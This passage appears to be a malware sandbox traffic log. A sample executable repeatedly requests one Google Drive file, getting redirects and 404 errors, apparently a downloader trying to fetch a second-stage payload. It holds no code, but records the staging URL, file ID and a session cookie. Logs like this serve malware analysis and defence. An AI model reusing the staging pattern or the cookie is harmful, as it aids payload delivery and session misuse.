                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    69 | 192.168.2.7 | 52254 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:23 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:23 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSEUf-K29TV9HspK0iSDM7RCSRVKz_kA2P1kbpvXmXkwhwemq6I7T49-nmDdVhGUd_D
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:23 GMT
                                                    Content-Security-Policy: script-src 'nonce-Ym_zG50vr_fB-inpM67hIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:23 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5r2GQ5oxYRsEoPb9wAxbeg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    70 | 192.168.2.7 | 52255 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:24 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:24 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:24 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-bIpuvhyvWmlbUenpdKAuzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    71 | 192.168.2.7 | 52256 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:25 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:25 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4BY1nMj23zxUvINk7iCRVYfwnM7SJyS59HLu01AxQcbEt_t1PMsBTa1puGL-7HJd-j
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:25 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-XNh2jNlbj1Z485zPG3wAcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:25 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="b11CN7ahMAzVGsJIXCx5qQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    72 | 192.168.2.7 | 52257 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:26 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:27 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:27 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-1KKncOaVqLvXhWhawPvvFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    73 | 192.168.2.7 | 52258 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:27 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:28 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTBBergi_s54k7dUz975d3ixzRUK8TNFx8aKzjtZ2sRaKib5nquoehgflUCUTfplAuo
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:28 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-Dmo84NXbWAtznyBEhBK7TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:28 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="enr8D2-RRxPHcukU-tCGuA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    74 | 192.168.2.7 | 52259 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:29 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:29 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:29 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-yf1vyQEeZzLXkLkBsIKyQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    75 | 192.168.2.7 | 52260 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:30 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:30 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6jyjbFgl1gbFUK4iRhij7444whM1hxRBhLWIo4H4OpzRGSuyM374RKBzIlJfs8wkx9
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:30 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-zHYg6pJBMH4ucdlT9rCToA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:30 UTC | 1652 | IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T4T-rrHKZ9ks-jcXpXdaag">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    76 | 192.168.2.7 | 52261 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:31 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:32 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:31 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-yf1yxCIH2KwUU7kcquzE5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    77 | 192.168.2.7 | 52262 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:32 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:33 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4SLsGYiHjPz9MQVJJkoc26BLu4oYhKQquwdqkDK-wlscsZvDAuJdgoNE6H7ErPhPRuuXwXY64
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
